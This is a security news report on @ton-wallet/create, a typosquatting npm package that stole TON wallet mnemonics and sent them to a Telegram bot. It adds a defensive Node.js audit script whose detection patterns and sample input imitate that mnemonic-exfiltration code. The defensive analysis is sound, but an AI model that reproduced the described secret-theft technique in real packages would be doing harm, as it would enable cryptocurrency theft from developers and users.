Malicious Package (@ton-wallet/create) | Image: Socket
A newly discovered malicious npm package, @ton-wallet/create, has been found stealing mnemonic phrases from unsuspecting developers and users in the TON (The Open Network) blockchain ecosystem. The threat, uncovered by The Socket Research Team, impersonated the legitimate @ton/ton package and remained undetected for six months, posing a significant supply chain security risk.
The @ton-wallet/create package masqueraded as the trusted @ton/ton dependency, a widely used package with over 64,804 weekly downloads. The name similarity allowed attackers to trick developers into installing the malicious version.
According to the Socket Research Team: “The threat actor’s strategy was straightforward but effective. By mimicking the legitimate @ton/ton package, widely used in the TON blockchain community, @ton-wallet/create gained credibility.”
For half a year, this stealthy attack siphoned off sensitive mnemonic phrases, leaving wallet holders and blockchain developers exposed to cryptocurrency theft.
At the core of this attack was the process.env.MNEMONIC environment variable—a commonly used method for storing wallet recovery phrases in Node.js applications. Any code loaded into the Node.js process, including a transitive dependency, can read that variable. The attackers injected malicious JavaScript code into index.js within the npm package, silently exfiltrating these recovery phrases.
The injected script uses node-telegram-bot-api to send stolen mnemonics directly to an attacker-controlled Telegram bot. The hardcoded API token and chat ID ensured seamless theft of private wallet keys without raising immediate suspicion.
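As an added example (not code from Socket's report or from the package itself), the following Node.js audit helper flags the combination the article describes: a dependency name that resembles the trusted @ton scope but is not on an allowlist, together with source text that reads process.env.MNEMONIC, imports node-telegram-bot-api and carries a hard-coded Telegram bot token. The allowlist, the sample package.json and the sample source text are constructed assumptions for the demo.

```javascript
// Heuristic supply-chain audit for the pattern described above.
// Assumption: KNOWN_GOOD is the project's own allowlist of trusted TON packages.
const KNOWN_GOOD = new Set(['@ton/ton', '@ton/core', '@ton/crypto']);
// Shape of a Telegram bot token: numeric bot id, colon, 35-character secret.
const TELEGRAM_TOKEN = /\b\d{8,10}:[A-Za-z0-9_-]{35}\b/;

// Dependency names that look like the @ton scope but are not on the allowlist.
function findLookalikes(dependencies) {
  return Object.keys(dependencies).filter(
    (name) => /^@?ton[-_/]/i.test(name) && !KNOWN_GOOD.has(name)
  );
}

// Collect indicators from a package's source text; each hit is one finding.
function auditSource(src) {
  const findings = [];
  if (/process\.env\.MNEMONIC\b/.test(src)) findings.push('reads process.env.MNEMONIC');
  if (/require\(['"]node-telegram-bot-api['"]\)|from\s+['"]node-telegram-bot-api['"]/.test(src))
    findings.push('imports node-telegram-bot-api');
  if (TELEGRAM_TOKEN.test(src)) findings.push('hard-coded Telegram bot token');
  return findings;
}

// BLOCK when the secret is read AND an exfiltration channel is present;
// REVIEW for a look-alike name alone; OK otherwise.
function auditPackage(pkgJson, indexSrc) {
  const lookalikes = findLookalikes(pkgJson.dependencies || {});
  const findings = auditSource(indexSrc);
  const exfil = findings.includes('reads process.env.MNEMONIC') && findings.length >= 2;
  const verdict = exfil ? 'BLOCK' : lookalikes.length ? 'REVIEW' : 'OK';
  return { lookalikes, findings, verdict };
}

// Constructed sample input mirroring the article; the token is a placeholder, not a real one.
const SAMPLE_PKG = {
  name: 'demo-app',
  dependencies: { '@ton-wallet/create': '1.0.0', '@ton/core': '0.56.0' },
};
const SAMPLE_INDEX = [
  "const TelegramBot = require('node-telegram-bot-api');",
  "const TOKEN = '1234567890:" + 'A'.repeat(35) + "';",
  'const phrase = process.env.MNEMONIC;',
].join('\n');

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_INDEX), null, 2));
```

Run it against the real package.json and each dependency's entry file from node_modules; the name heuristic is deliberately crude and should be tuned to your own allowlist.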
With over 1 million TON users worldwide, the scale of potential damage was enormous, making immediate response and mitigation essential.